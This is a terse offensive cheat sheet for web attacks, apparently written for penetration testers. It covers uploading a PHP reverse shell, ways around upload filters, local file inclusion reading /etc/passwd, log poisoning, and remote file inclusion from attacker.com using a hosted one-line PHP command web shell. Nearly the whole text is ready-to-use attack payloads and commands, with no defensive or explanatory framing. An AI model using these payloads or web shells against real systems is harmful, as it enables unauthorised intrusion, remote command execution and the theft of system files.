File Upload

# PHP reverse shell
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
# Edit IP & port, upload, trigger: http://target/uploads/shell.php

# Bypass filters
shell.pHp5
shell.php;.jpg
Content-Type: image/jpeg (in Burp, send PHP code anyway)

# Double extensions or magic bytes (PNG/JPG headers + PHP payload)

LFI

# Basic LFI test
/index.php?page=../../../../etc/passwd

# LFI with null byte (older PHP)
/index.php?page=../../../../etc/passwd%00

# Apache log poison (if no upload)
/index.php?page=/var/log/apache2/access.log

# /proc/self/environ shell (old trick)
/index.php?page=/proc/self/environ

RFI

/index.php?page=http://attacker.com/shell.txt
# Host payload on your listener:
echo "<?php system(\$_GET['cmd']); ?>" > shell.txt
python3 -m http.server 80